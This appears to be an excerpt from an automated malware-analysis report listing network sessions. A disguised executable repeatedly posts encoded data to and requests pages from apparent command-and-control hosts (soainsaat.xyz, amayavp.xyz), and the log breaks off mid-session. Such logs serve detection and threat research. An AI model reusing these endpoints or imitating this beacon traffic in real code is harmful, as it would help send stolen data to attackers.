                                                      10192.168.2.94997385.159.66.93801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:16.376543999 CET771OUTPOST /rum2/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.soainsaat.xyz
                                                      Origin: http://www.soainsaat.xyz
                                                      Referer: http://www.soainsaat.xyz/rum2/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 44 7a 6b 75 33 56 6d 75 59 76 78 57 76 4c 46 79 6d 43 69 6d 43 58 39 6d 31 72 38 77 3d 3d
                                                      Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gDzku3VmuYvxWvLFymCimCX9m1r8w==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.94997985.159.66.93801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:19.048573971 CET1784OUTPOST /rum2/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.soainsaat.xyz
                                                      Origin: http://www.soainsaat.xyz
                                                      Referer: http://www.soainsaat.xyz/rum2/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 65 57 70 76 78 50 6c 7a 5a 48 63 2b 70 77 6b 35 6c 47 75 48 67 6d 2f 39 32 2f 6c 2f 47 63 75 6f 41 6b 46 51 6d 45 64 4f 36 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 66 43 67 47 4f 64 75 42 62 65 35 64 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxeWpvxPlzZHc+pwk5lGuHgm/92/l/GcuoAkFQmEdO6tPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMfCgGOduBbe5dRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpFEUMAvBF4sD8cpJK+KkbbJi7Z0OqZQLrYS71f/4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4l/J45TtObzWIFPHkQZ8VO0T6Soay2PFgjaHia4tTWZFmnW0vX+mAJPQfCrFqETQ/a7omXFJyxtoqjHZNvLepOz+w687QYv3Hh0UXnyJYdvViBXqfYDTX0w4ez0PzATpTSu6ri7/+lBBwdC9zvb85SjKwBfSS+J5M7wYy4s/BIqMsKl2hlUIL3vJYweSSS8fEW8kIGm9TON8jRxpeyakc613YqOiyiDZmVpMGz0Z7/i2su6v9g8qmRh78caduIBxtBgP58hSkawQjEAMwxP559cOzoVeoYzgux6al0J8vEcKRO26YS3SdKQBmeCm+2D6IVZeWy7WM/GuxfjTL4V1MemELIv4rvgmSbFzkxKtwq+I31/yis3YrzdAtEAEfX5WZCcOMFCfnsNDFjT3Zp44JFKrstLWtHE2Uz2iNlqTnC7vq29RD1DTlA9wSR812dkbi4c1f5byddtdQH88vB/7u8agXhzbxh03umMRDAmwR58ial58pFl0GTUynDqzowolAKVpTtw0NZiU9G [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.94998685.159.66.93801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:21.713526011 CET479OUTGET /rum2/?6vSXrZxp=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB3zcAk+0XRlHo47zsG34ZF8bKKHH4pA==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.soainsaat.xyz
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:14:23.128655910 CET225INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.14.1
                                                      Date: Sun, 24 Nov 2024 07:14:22 GMT
                                                      Content-Length: 0
                                                      Connection: close
                                                      X-Rate-Limit-Limit: 5s
                                                      X-Rate-Limit-Remaining: 19
                                                      X-Rate-Limit-Reset: 2024-11-24T07:14:27.9027889Z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.949987185.27.134.144801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:28.872050047 CET741OUTPOST /d9ku/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.amayavp.xyz
                                                      Origin: http://www.amayavp.xyz
                                                      Referer: http://www.amayavp.xyz/d9ku/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 73 59 49 30 59 48 37 4d 2b 71 67 70 34 2b 61 4b 38 45 49 70 4b 52 67 41 45 51 34 6c
                                                      Data Ascii: 6vSXrZxp=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmsYI0YH7M+qgp4+aK8EIpKRgAEQ4l
                                                      Nov 24, 2024 08:14:30.104646921 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:14:29 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED]
                                                      Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.949988185.27.134.144801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:31.531040907 CET765OUTPOST /d9ku/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.amayavp.xyz
                                                      Origin: http://www.amayavp.xyz
                                                      Referer: http://www.amayavp.xyz/d9ku/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 67 6e 44 33 78 4e 4f 6f 57 46 47 68 74 50 49 49 73 44 53 57 68 50 4f 44 44 55 52 41 3d 3d
                                                      Data Ascii: 6vSXrZxp=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGgnD3xNOoWFGhtPIIsDSWhPODDURA==
                                                      Nov 24, 2024 08:14:32.766488075 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:14:32 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED]
                                                      Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.949989185.27.134.144801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:34.191000938 CET1778OUTPOST /d9ku/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.amayavp.xyz
                                                      Origin: http://www.amayavp.xyz
                                                      Referer: http://www.amayavp.xyz/d9ku/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6e 4d 71 4d 45 34 36 4b 67 5a 59 57 64 4b 64 4a 68 45 71 50 59 63 64 4d 6e 67 4c 64 77 79 2f 4f 61 4f 42 50 4b 38 48 6a 57 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 36 6e 78 65 2b 6e 48 47 63 47 53 46 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoNM7/rt+nMqME46KgZYWdKdJhEqPYcdMngLdwy/OaOBPK8HjWoFMdzh/Xa87GpBL+jL5q7f0wcO+luFwlIssOXdvVAqMgNy/SQYunnurapKRMzt6nxe+nHGcGSFBKaGMX4ROG9HpLNPuhr+LviRlpWKS4IliHtpUVXNz934+9Pi/udq2eU5x5+9BRxQA6Ms9Q50JU9U4ubXoTFOwWeKWsNFlHfc2IMsH0DbT1Un5Gph91dhzheGUGJFMzbiNGT+trYSb0jZaOfsnRbrkRYItMilK7vR9U/cXDOyGTdhBIKg+WGgN1jB1++XfOjXNVPr7aVWR9+sEIGYNc+LBGCXBo48Jml4RRWzZav278v99rNzvQ3mE9PzdIZ5gvSv0TMj1yeZ8RVLVbqVgbtLTEhYIcOuQF9M2TidLZRkuhbs+0Hli1Dsmk5YxLrDqkU7XnICeE2KbRhUDl2OZX6Zy1L7iyykhtYbsHSzLn/2V8cA+KeB+HzCQIH9CcE3gU7QB2ux5ghf/+iZxNu98uy9Rh66pheqlYeRA6I5U0RTeatlwqMFVs0XVTcrNbxQyA/XdpIkf8BUTHFSBgErdFfb5EriNmHaAbVub/5yXpEEluW8jQOOCf0SCzUNgRY2xt75IAzZylL69cbkXDnaUL/02yUDmbxCdqMnoSmffpFpmW4dZhLEds1UPmhmhqxmTrZeYriaQ+b4eLy7ud3QHFSGQITvia5vJuOgue8lGColTkF+S20u7enhAYjCf7UIDklsuDBzPVJjWA0rtiUSX9jSnwamTZcKRcjqeevHudt8O5LYgxtb52ybZJpMg9sjmLR2muThbk0 [TRUNCATED]
                                                      Nov 24, 2024 08:14:35.516946077 CET683INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:14:35 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Content-Encoding: br
                                                      Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED]
                                                      Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.949990185.27.134.144801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:36.852869034 CET477OUTGET /d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.amayavp.xyz
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:14:38.188205957 CET1168INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:14:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 967
                                                      Connection: close
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      Cache-Control: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                      Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5057ef7fb7e074db92f649325c26e6fd");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.949991172.67.145.234801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:44.018094063 CET735OUTPOST /vg0z/ HTTP/1.1
